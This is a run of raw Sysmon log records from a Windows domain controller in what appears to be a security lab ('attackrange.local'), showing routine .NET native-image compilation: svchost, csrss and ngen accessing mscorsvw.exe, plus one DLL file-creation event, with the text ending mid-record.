13:50:18.415{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E203-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.400{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E203-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.400{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E203-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E103-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.337{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E103-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.337{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E103-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E003-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.212{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E003-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.212{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E003-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.134{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-DF03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.119{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-DF03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.119{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-DF03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.087{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-DE03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.072{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-DE03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-DE03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.040{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-DD03-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.025{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-DD03-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.025{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-DD03-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:19.978{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12f4-0\PresentationFramework-SystemData.dll2021-01-18 13:50:19.978 10341000x80000000000000008155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.931{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.915{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.915{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.868{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E603-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.853{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E603-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 